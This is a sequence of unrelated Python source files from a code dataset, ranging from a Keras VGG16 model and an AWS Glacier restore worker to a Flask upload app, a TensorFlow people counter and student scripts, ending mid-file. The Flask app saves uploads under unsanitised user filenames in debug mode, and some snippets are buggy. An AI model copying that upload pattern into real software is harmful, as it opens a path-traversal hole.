\nhttps://github.com/tensorflow/models/blob/master/research/slim/nets/vgg.py\n\"\"\"\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\nclass Vgg16(object):\n # Adopt the static method to enable the elegant realization of the model \n @staticmethod \n def build(input_shape, num_classes, exclude_fc=None):\n\n if exclude_fc: \n # Make the sequential conv_base \n conv_base = keras.Sequential(\n [ \n keras.Input(shape=input_shape),\n\n # Conv Block 1 \n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 2 \n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 3 \n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 4 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 5 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n ]\n )\n return conv_base \n\n else: \n # Make the sequential conv_base \n model = keras.Sequential(\n [ \n keras.Input(shape=input_shape),\n\n # Conv Block 1 \n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=64, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 2 \n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=128, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 3 \n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=256, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 4 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # Conv Block 5 \n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\", kernel_initializer='he_normal'),\n layers.MaxPooling2D(pool_size=(2,2), strides=(2,2)),\n\n # FC classifier \n layers.Flatten(),\n layers.Dense(units=4096, activation=\"relu\"),\n layers.Dense(units=4096, activation=\"relu\"),\n layers.Dense(units=num_classes, activation=\"softmax\")\n\n ]\n )\n\n return model\n \n \nif __name__ == '__main__':\n \n # Assign the vlaues \n input_shape = (227,227,3)\n num_classes = 1000\n # -exclude_fc = False \n exclude_fc = True\n\n # Call the function of build() in the Vgg16 class with the dot syntax\n # -model = Vgg16().build(input_shape, num_classes, exclude_fc)\n conv_base = Vgg16().build(input_shape, num_classes, exclude_fc)\n\n # Show the Vgg16 Model \n # -model.summary()\n conv_base.summary()\n","sub_path":"vgg16_model_sets/vgg16_conv_fc.py","file_name":"vgg16_conv_fc.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"605377908","text":"# restore.py\n#\n# NOTE: This file lives on the Utils instance\n#\n# Copyright (C) 2011-2019 Vas Vasiliadis\n# University of Chicago\n##\n__author__ = 'Vas Vasiliadis '\n\nimport os\nimport sys\n\n# Import utility helpers\nsys.path.insert(1, os.path.realpath(os.path.pardir))\nimport helpers\n\n# Get configuration\nfrom configparser import SafeConfigParser\n\nconfig = SafeConfigParser(os.environ)\nconfig.read('restore_config.ini')\n\n# Add utility code here\nimport boto3\nimport botocore\nfrom botocore.client import Config\nimport requests\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\nimport json\n\n# Conect to SQS and get the message from the queue\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html#SQS.Queue\nsqs = boto3.resource('sqs', region_name=config['aws']['AwsRegionName'])\nqueue = sqs.Queue(url=config['aws']['RestoreQueueUrl'])\nglacier_client = boto3.client('glacier', region_name=config['aws']['AwsRegionName'])\nsnsClient = boto3.client('sns', region_name=config['aws']['AwsRegionName'])\n\ndynamo = boto3.resource('dynamodb', region_name=config['aws']['AwsRegionName'])\ntable = dynamo.Table(config['aws']['AWSDynamodbAnnotationsTable'])\n\n# Poll the message queue in a loopn\nwhile True:\n # Attempt to read a message from teh Queue\n # Use long polloing, here as 20 second wait times\n # print(f\"Polling SQS with {config['aws']['PollWaitTime']} seconds wait time\")\n response = queue.receive_messages(\n WaitTimeSeconds=int(config['aws']['PollWaitTime']),\n )\n\n if response:\n message_body = json.loads(response[0].body)\n message_data = json.loads(message_body[\"Message\"])\n # print(\"Message Read in restore.py\")\n # print(f'{message_data}')\n\n user_id = message_data[\"user_id\"]\n thaw_status = message_data[\"thaw_status\"]\n\n # print(f'User {user_id} bought premium. Status {thaw_status}')\n\n query_dict = table.scan(\n FilterExpression=Attr('user_id').eq(user_id) & Attr('storage_status').eq('ARCHIVED'),\n )\n # note: the archive process immediately specifies 'ARCHIVED' fpr stprage_status\n # and it only archives for free users. If A user converted to premium under 5 minutes of a job\n # nothing happens. If a user converted to premium while one is being archived,\n # it will show up and be put into this query dictionary for retrieval\n\n # print(f'\\n\\n\\nPrinting query dictionary: \\n\\n\\n {query_dict}\\n\\n\\n')\n\n for item in query_dict['Items']:\n\n try:\n # print(\"trying data retrieval expedited\")\n # docs.aws.amazon.com/amazonglacier/latest/dev/api-initiate-job-post.html\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.initiate_job\n glacier_response = glacier_client.initiate_job(\n accountId='-',\n vaultName=config['aws']['VaultName'],\n jobParameters={\n 'Description': item['s3_key_result_file'],\n 'SNSTopic': config['aws']['ThawARN'],\n 'ArchiveId': item['results_file_archive_id'],\n 'Type': \"archive-retrieval\",\n 'Tier': 'Expedited',\n }\n )\n # print(response)\n except ClientError as e:\n try:\n # print(\"Failed data retrieval expedited, trying standard\")\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/glacier.html#Glacier.Client.initiate_job\n glacier_response = glacier_client.initiate_job(\n accountId='-',\n vaultName='ucmpcs',\n jobParameters={\n 'Description': item['s3_key_result_file'],\n 'SNSTopic': config['aws']['ThawARN'],\n 'ArchiveId': str(item['results_file_archive_id']),\n 'Type': \"archive-retrieval\",\n 'Tier': 'Standard',\n }\n )\n # print(response)\n except ClientError as e:\n # print(\"Unable to retrieve form archive\")\n raise e\n\n try:\n # print(\"Deleting notify message now--not now\")\n response[0].delete()\n except ClientError as e:\n # print(\"Failed to delete message from sqs: {}\".format(str(e)))\n # print(str(e))\n raise ClientError\n### EOF\n","sub_path":"gas/util/restore/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148021626","text":"import os\nfrom flask import Flask, request, render_template, redirect\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n file = request.files['image']\n if file != None and file.filename != '':\n path = 'static/' + file.filename\n file.save(path)\n return redirect('/static/' + file.filename)\n else:\n return 'Something happen, cannot upload file. Please try again'\napp.run(debug=True)\n","sub_path":"upload_file_flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263753372","text":"\"\"\"\nWhat do we want to detect? names of recognized people, # unrecognized people, # of unknown people\nTime sensitivity issue: use mode\npeople shouldn't be too small\n\"\"\"\n\nimport cv2\nprint(cv2.__version__)\nimport tensorflow as tf\nprint(tf.__version__)\nimport numpy as np\nimport time\nimport math\n\n#Detector API based on tutorial https://medium.com/@madhawavidanapathirana/real-time-human-detection-in-computer-vision-part-2-c7eda27115c6 \n# who himself references https://gist.github.com/madhawav/1546a4b99c8313f06c0b2d7d7b4a09e2\nclass DetectorAPI:\n def __init__(self, path_to_ckpt):\n self.path_to_ckpt = path_to_ckpt\n\n self.detection_graph = tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(self.path_to_ckpt, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n self.default_graph = self.detection_graph.as_default()\n self.sess = tf.Session(graph=self.detection_graph)\n\n # Definite input and output Tensors for detection_graph\n self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n self.num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n\n def processFrame(self, image):\n # Expand dimensions since the trained_model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image, axis=0)\n # Actual detection.\n start_time = time.time()\n (boxes, scores, classes, num) = self.sess.run(\n [self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],\n feed_dict={self.image_tensor: image_np_expanded})\n end_time = time.time()\n elapsed_time = end_time-start_time\n\n im_height, im_width,_ = image.shape\n boxes_list = [None for i in range(boxes.shape[1])]\n for i in range(boxes.shape[1]):\n boxes_list[i] = (int(boxes[0,i,0] * im_height),\n int(boxes[0,i,1]*im_width),\n int(boxes[0,i,2] * im_height),\n int(boxes[0,i,3]*im_width))\n\n return boxes_list, scores[0].tolist(), [int(x) for x in classes[0].tolist()], int(num[0]), elapsed_time\n\n def close(self):\n self.sess.close()\n self.default_graph.close()\n\ndef default_callback(frame_index, person_count): \n str = frame_index + person_count\ndef count_people_video(model='ssd_mobilenet_v1_coco_2018_01_28/frozen_inference_graph.pb', \n video='http://10.1.2.155:4747/mjpegfeed?640x480', \n print_count=True, \n print_fps=True,\n visual=True,\n threshold=0.1):\n model_path = 'models/'+model\n video_path = video\n odapi = DetectorAPI(path_to_ckpt=model_path)\n #cap = cv2.VideoCapture('/content/drive/My Drive/Photos/Google Photos/VID_20190101_195059.mp4')\n #cap = cv2.VideoCapture('/content/drive/My Drive/MOV_0011.mp4')\n cap = cv2.VideoCapture(video_path)\n while (cap.isOpened()):\n if(print_count == True):\n r, img = cap.read()\n if(r == True):\n img = cv2.resize(img, (1280, 720))\n\n boxes, scores, classes, num, elapsed_time = odapi.processFrame(img)\n\n boxcount = 0\n for i in range(len(boxes)):\n # Class 1 represents human\n if classes[i] == 1 and scores[i] > threshold:\n boxcount += 1\n box = boxes[i]\n img = cv2.rectangle(img,(box[1],box[0]),(box[3],box[2]),(255,0,0),2)\n if(print_count == True):\n print_str = \"Frame has \"+str(boxcount)+\" people in it.\"\n if(print_fps == True):\n fps = 1/elapsed_time\n if(print_count or print_fps):\n print(print_str)\n \n if(visual == True):\n cv2.imshow(\"Preview\", cv2.resize(img, (640, 480)))\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else: \n break\n \n else:\n print(\"Can't open video.\")\n \ncount_people_video(visual=True, print_fps=True)","sub_path":"ML/detect_wifi.py","file_name":"detect_wifi.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"93438582","text":"'''!\n * Copyright (c) 2020 Microsoft Corporation. All rights reserved.\n * Licensed under the MIT License. \n'''\n \nfrom .model import *\nimport time\nfrom sklearn.metrics import mean_squared_error, r2_score, roc_auc_score, \\\n accuracy_score, mean_absolute_error, log_loss, average_precision_score, \\\n f1_score\nimport numpy as np\nfrom sklearn.model_selection import RepeatedStratifiedKFold\n\n\ndef get_estimator_class(objective_name, estimator_name):\n ''' when adding a new learner, need to add an elif branch '''\n\n\n if 'xgboost' in estimator_name:\n if 'regression' in objective_name:\n estimator_class = XGBoostEstimator\n else:\n estimator_class = XGBoostSklearnEstimator\n elif 'rf' in estimator_name:\n estimator_class = RandomForestEstimator\n elif 'lgbm' in estimator_name:\n estimator_class = LGBMEstimator\n elif 'lrl1' in estimator_name:\n estimator_class = LRL1Classifier\n elif 'lrl2' in estimator_name:\n estimator_class = LRL2Classifier \n elif 'catboost' in estimator_name:\n estimator_class = CatBoostEstimator\n elif 'extra_tree' in estimator_name:\n estimator_class = ExtraTreeEstimator\n elif 'kneighbor' in estimator_name:\n estimator_class = KNeighborsEstimator\n else:\n raise ValueError(estimator_name + ' is not a built-in learner. '\n 'Please use AutoML.add_learner() to add a customized learner.')\n return estimator_class\n \n\ndef sklearn_metric_loss_score(metric_name, y_predict, y_true, labels=None):\n '''Loss using the specified metric\n\n Args:\n metric_name: A string of the mtric name, one of \n 'r2', 'rmse', 'mae', 'mse', 'accuracy', 'roc_auc', 'log_loss', \n 'f1', 'ap'\n y_predict: A 1d or 2d numpy array of the predictions which can be\n used to calculate the metric. E.g., 2d for log_loss and 1d\n for others. \n y_true: A 1d numpy array of the true labels\n labels: A 1d numpy array of the unique labels\n \n Returns:\n score: A float number of the loss, the lower the better\n '''\n metric_name = metric_name.lower()\n if 'r2' in metric_name:\n score = 1.0 - r2_score(y_true, y_predict)\n elif metric_name == 'rmse':\n score = np.sqrt(mean_squared_error(y_true, y_predict))\n elif metric_name == 'mae':\n score = mean_absolute_error(y_true, y_predict)\n elif metric_name == 'mse':\n score = mean_squared_error(y_true, y_predict)\n elif metric_name == 'accuracy':\n score = 1.0 - accuracy_score(y_true, y_predict)\n elif 'roc_auc' in metric_name:\n score = 1.0 - roc_auc_score(y_true, y_predict)\n elif 'log_loss' in metric_name:\n score = log_loss(y_true, y_predict, labels=labels)\n elif 'f1' in metric_name:\n score = 1 - f1_score(y_true, y_predict)\n elif 'ap' in metric_name:\n score = 1 - average_precision_score(y_true, y_predict)\n else:\n raise ValueError(metric_name+' is not a built-in metric, '\n 'currently built-in metrics are: '\n 'r2, rmse, mae, mse, accuracy, roc_auc, log_loss, f1, ap. '\n 'please pass a customized metric function to AutoML.fit(metric=func)')\n return score\n\n\ndef get_y_pred(estimator, X, eval_metric, obj):\n if eval_metric in ['roc_auc', 'ap'] and 'binary' in obj:\n y_pred_classes = estimator.predict_proba(X) \n y_pred = y_pred_classes[:,\n 1] if y_pred_classes.ndim>1 else y_pred_classes\n elif eval_metric in ['log_loss', 'roc_auc']:\n y_pred = estimator.predict_proba(X)\n else:\n y_pred = estimator.predict(X)\n return y_pred\n\n\ndef get_test_loss(estimator, X_train, y_train, X_test, y_test, eval_metric, obj,\n labels=None, budget=None, train_loss=False):\n start = time.time()\n train_time = estimator.fit(X_train, y_train, budget)\n if isinstance(eval_metric, str):\n test_pred_y = get_y_pred(estimator, X_test, eval_metric, obj)\n test_loss = sklearn_metric_loss_score(eval_metric, test_pred_y, y_test,\n labels)\n if train_loss != False:\n test_pred_y = get_y_pred(estimator, X_train, eval_metric, obj)\n train_loss = sklearn_metric_loss_score(eval_metric, test_pred_y,\n y_train, labels)\n else: # customized metric function\n test_loss, train_loss = eval_metric(\n X_test, y_test, estimator, labels, X_train, y_train)\n train_time = time.time()-start\n return test_loss, train_time, train_loss\n\n\ndef train_model(estimator, X_train, y_train, budget):\n train_time = estimator.fit(X_train, y_train, budget)\n return train_time\n\n\ndef evaluate_model(estimator, X_train, y_train, X_val, y_val, budget, kf,\n objective_name, eval_method, eval_metric, best_val_loss, train_loss=False):\n if 'holdout' in eval_method:\n val_loss, train_loss, train_time = evaluate_model_holdout(\n estimator, X_train, y_train, X_val, y_val, budget, \n objective_name, eval_metric, best_val_loss, train_loss=train_loss)\n else:\n val_loss, train_loss, train_time = evaluate_model_CV(\n estimator, X_train, y_train, budget, kf, objective_name, \n eval_metric, best_val_loss, train_loss=train_loss)\n return val_loss, train_loss, train_time\n\n\ndef evaluate_model_holdout(estimator, X_train, y_train, X_val, y_val, budget,\n objective_name, eval_metric, best_val_loss, train_loss=False):\n val_loss, train_time, train_loss = get_test_loss(\n estimator, X_train, y_train, X_val, y_val, eval_metric, objective_name,\n budget = budget, train_loss=train_loss)\n return val_loss, train_loss, train_time\n\n\ndef evaluate_model_CV(estimator, X_train_all, y_train_all, budget, kf,\n objective_name, eval_metric, best_val_loss, train_loss=False):\n start_time = time.time()\n total_val_loss = total_train_loss = 0\n train_time = 0\n valid_fold_num = 0\n n = kf.get_n_splits()\n X_train_split, y_train_split = X_train_all, y_train_all\n if objective_name=='regression':\n labels = None\n else:\n labels = np.unique(y_train_all) \n\n if isinstance(kf, RepeatedStratifiedKFold):\n kf = kf.split(X_train_split, y_train_split)\n else:\n kf = kf.split(X_train_split)\n rng = np.random.RandomState(2020)\n val_loss_list = []\n budget_per_train = budget / (n+1)\n for train_index, val_index in kf:\n train_index = rng.permutation(train_index)\n if isinstance(X_train_all, pd.DataFrame):\n X_train, X_val = X_train_split.iloc[\n train_index], X_train_split.iloc[val_index]\n else:\n X_train, X_val = X_train_split[\n train_index], X_train_split[val_index]\n if isinstance(y_train_all, pd.Series):\n y_train, y_val = y_train_split.iloc[\n train_index], y_train_split.iloc[val_index]\n else:\n y_train, y_val = y_train_split[\n train_index], y_train_split[val_index]\n estimator.cleanup()\n val_loss_i, train_time_i, train_loss_i = get_test_loss(\n estimator, X_train, y_train, X_val, y_val, eval_metric, \n objective_name, labels, budget_per_train, train_loss=train_loss)\n valid_fold_num += 1\n total_val_loss += val_loss_i\n if train_loss != False: \n if total_train_loss != 0: total_train_loss += train_loss_i\n else: total_train_loss = train_loss_i\n train_time += train_time_i\n if valid_fold_num == n:\n val_loss_list.append(total_val_loss/valid_fold_num)\n total_val_loss = valid_fold_num = 0\n elif time.time() - start_time >= budget:\n val_loss_list.append(total_val_loss/valid_fold_num)\n break\n val_loss = np.max(val_loss_list)\n if train_loss != False: train_loss = total_train_loss/n\n budget -= time.time() - start_time\n if val_loss < best_val_loss and budget > budget_per_train:\n estimator.cleanup()\n train_time_full = estimator.fit(X_train_all, y_train_all, budget)\n train_time += train_time_full\n return val_loss, train_loss, train_time\n\n\ndef compute_estimator(X_train, y_train, X_val, y_val, budget, kf,\n config_dic, objective_name, estimator_name, eval_method, eval_metric, \n best_val_loss = np.Inf, n_jobs=1, estimator_class=None, train_loss=False):\n start_time = time.time()\n estimator_class = estimator_class or get_estimator_class(\n objective_name, estimator_name)\n estimator = estimator_class(\n **config_dic, objective_name = objective_name, n_jobs=n_jobs)\n val_loss, train_loss, train_time = evaluate_model(\n estimator, X_train, y_train, X_val, y_val, budget, kf, objective_name, \n eval_method, eval_metric, best_val_loss, train_loss=train_loss)\n all_time = time.time() - start_time\n return estimator, val_loss, train_loss, train_time, all_time\n\n\ndef train_estimator(X_train, y_train, config_dic, objective_name,\n estimator_name, n_jobs=1, estimator_class=None, budget=None):\n start_time = time.time()\n estimator_class = estimator_class or get_estimator_class(objective_name,\n estimator_name)\n estimator = estimator_class(**config_dic, objective_name = objective_name,\n n_jobs=n_jobs)\n if X_train is not None:\n train_time = train_model(estimator, X_train, y_train, budget)\n else:\n estimator = estimator.estimator_class(**estimator.params)\n train_time = time.time() - start_time\n return estimator, train_time\n\n\ndef get_classification_objective(num_labels: int) -> str:\n if num_labels == 2:\n objective_name = 'binary:logistic'\n else:\n objective_name = 'multi:softmax'\n return objective_name\n\n\n","sub_path":"flaml/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":9710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"622008717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 14:29:33 2019\n\n@author: xiongyi\n\"\"\"\nimport re\nimport numpy as np\n\nfilename = '/home/xiongyi/Codes/pytorch-pretrained-BERT/examples/11_06_00_02DeBERT_root.log'\nres = []\nwith open(filename ,'r') as fd:\n line = fd.readline() \n while (line):\n pear = re.findall(r\"Pearson = (.*),\", line)\n #print (pear)\n if (len(pear) >0):\n res.append(pear[0]) \n accs = re.findall(r\"Test acc : (.*) for (.*)\", line)\n if (len(accs) >0):\n #res.append(accs[0][1] + ':' + accs[0][0])\n res.append(accs[0][0])\n line = fd.readline() \ntasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16',\n 'MR', 'CR', 'MPQA', 'SUBJ', 'SST2', 'SST5', 'TREC', 'MRPC',\n 'SICKEntailment', 'SICKRelatedness', 'STSBenchmark',\n 'Length', 'WordContent', 'Depth', 'TopConstituents',\n 'BigramShift', 'Tense', 'SubjNumber', 'ObjNumber',\n 'OddManOut', 'CoordinationInversion']\n#res_mat = np.asanyarray(heads)\n","sub_path":"examples/parse_result.py","file_name":"parse_result.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275133739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 05:50:23 2019\n\n@author: HP\n\"\"\"\n\"\"\"\nChallenge 2\n Screen is messy and rolls ups\n Convert the code into function \n\n MAJOR REFACTORING OF THE CODE\n\"\"\"\n\n\nimport random\ndef game():\n list1=['mango','orange','grape','apple','lichi']\n sec=(random.choice(list1))\n print (sec)\n k=input (\" guess the world \")\n #if k is sec\n if k == sec:\n print (\"player wins\")\n else:\n print (\"computer wins\")\n \n\n\"\"\"\nChallenge 3\nRead the words from a file\n\n\"\"\"\nfor item in list1 :\n print (item)\n \n\n\"\"\"\nChallenge 4\n Get the list of Internet after web scrapping\n\"\"\"\n\n ","sub_path":"day3/mini_project2.py","file_name":"mini_project2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"417593817","text":"from subprocess import Popen, PIPE, STDOUT\r\n\r\n\r\n# Execute a command, and ensure a print of the shell output.\r\ndef ShellExecute(cmd, bSilent=False):\r\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\r\n output = p.stdout.read()\r\n if (not bSilent) and output:\r\n print(output)\r\n\r\n\r\nShellExecute('\"Premake5.exe\" --help')\r\ninput('')\r\n\r\n","sub_path":"Tools/Build/Premake/PremakeHelp.py","file_name":"PremakeHelp.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"569077864","text":"import os\n\ndef get_dirs(path):\n return [x for x in os.listdir(path) if os.path.isdir(path+x) ]\n\ndef get_filename(path,keyword):\n return [x for x in os.listdir(path) if os.path.isfile(path+x) and keyword in x ]\n\n\ndef get_all_dirs(path):\n results=[]\n current_level_dirs=get_dirs(path)\n\n current_level_dirs=list(map(lambda x:path+x+\"/\",current_level_dirs))\n results += current_level_dirs\n\n for i in current_level_dirs:\n results += get_all_dirs(i)\n\n return results\n\ndef search_keyword(keyword,path=\"./\"):\n dirs = get_all_dirs(path) + [path]\n for dir in dirs:\n files = get_filename(dir,keyword)\n for file in files:\n yield (dir+file)\n\nprint (\"############练习2#############\")\n\nfor i in search_keyword(\"000\"):\n print (i)\n\n","sub_path":"not_related/study/0011_os_module_study.py","file_name":"0011_os_module_study.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230361123","text":"# Find all text on page\nimport urllib.request\n# url = \"https://leohxj.gitbooks.io/front-end-database/interview/skill-path.html\" # The website url you want to access\n# response = urllib.request.urlopen(url)\n# data = response.read()\n# text = data.decode('utf-8-sig')\n# print(text)\n\n# Find target text\nfrom bs4 import BeautifulSoup\n\n# The website url you want to access\ndef downLoad():\n url = \"https://leohxj.gitbooks.io/front-end-database/interview/skill-path.html\"\n# Get HTML text\n response = urllib.request.urlopen(url)\n data = response.read()\n text = data.decode('utf-8-sig')\n return text\n\n# Export text\nprint(\"downloading.. \")\nprint(\"=============================\")\ntext = downLoad()\n\n# Target define\nsoup = BeautifulSoup(text, \"lxml\") # parse\n# get all list\nlistIdxs = soup.body.find_all('li', attrs={'class':'data-level'}) # get all list\nfor listIdx in listIdxs:\n targets = soup.body.find_all('a', attrs={'class':'chapter', listIdx :'title'+listIdx.text})\n for ta in targets:\n print(ta.text)\n","sub_path":"v2_otherSite.py","file_name":"v2_otherSite.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"132556680","text":"# coding:utf-8\n\"\"\"\n Time : 2021/1/27 下午3:56\n Author : vincent\n FileName: urls\n Software: PyCharm\n Last Modified by: vincent\n Last Modified time: 2021/1/27 下午3:56\n\"\"\"\nfrom django.conf.urls import url\n\nfrom drugstore import views\n\nurlpatterns = [\n url(r'^index/', views.index, name='index'),\n url(r'^shopholic/', views.shopholic_index, name='shopholic_index'),\n url(r'^login/', views.login, name='login'),\n url(r'^register/', views.register, name='register'),\n\n]","sub_path":"zhyf/drugstore/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"329182668","text":"import random\r\nlist_zmw=['_']\r\nfor i in range(10):\r\n list_zmw.append(str(i))\r\nfor i in range(65,91):\r\n list_zmw.append(str(chr(i)))\r\nfor i in range(97,123):\r\n list_zmw.append(str(chr(i)))\r\nfile=open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt','w')\r\nfile.write('用户名\\t\\t密码\\n')\r\nfile.close()\r\nfile=open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt','a')\r\ncount=0\r\nwhile count<10:\r\n user_zmw= ''\r\n pwd_zmw=''\r\n for i in range(6):\r\n s=random.randint(0, len(list_zmw) - 1)\r\n user_zmw= user_zmw + str(list_zmw[s])\r\n for i in range(6):\r\n s=random.randint(0, len(list_zmw) - 1)\r\n pwd_zmw= pwd_zmw + str(list_zmw[s])\r\n file.write(user_zmw + '\\t\\t'+pwd_zmw+'\\n')\r\n count+=1\r\nfile.close()\r\ndef w_zmw(func):\r\n def inner_zmw(user,pwd):\r\n func(user,pwd)\r\n read = open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt', 'r')\r\n while True:\r\n text=read.readline()\r\n if len(text)==0:\r\n break\r\n text=text.replace(\"\\n\",'')\r\n text=text.split(\"\\t\\t\")\r\n if text[0]==user and text[1]==pwd:\r\n return '登录成功'\r\n\r\n return '登录失败,请确认账号或者密码是否正确'\r\n return inner_zmw\r\n@w_zmw\r\ndef login_zmw(user,pwd):\r\n try:\r\n\r\n for i in user:\r\n if i not in list_zmw:\r\n raise Exception\r\n\r\n for i in pwd:\r\n if i not in list_zmw:\r\n raise Exception\r\n except:\r\n print('请不要输入汉字!')\r\nlist = []\r\ndef paixu():\r\n list_pai = []\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n test=read_grade.readline()\r\n if len(test)==0:\r\n break\r\n if test[:2]=='姓名':\r\n test = read_grade.readline()\r\n test=test.replace('\\n','')\r\n a=test.split(\"\\t\\t\")\r\n list_pai.append(a)\r\n #print(list_pai)\r\n read_grade.close()\r\n num=len(list_pai)\r\n for m in range(len(list_pai)):\r\n for n in range(len(list_pai) - m - 1):\r\n if 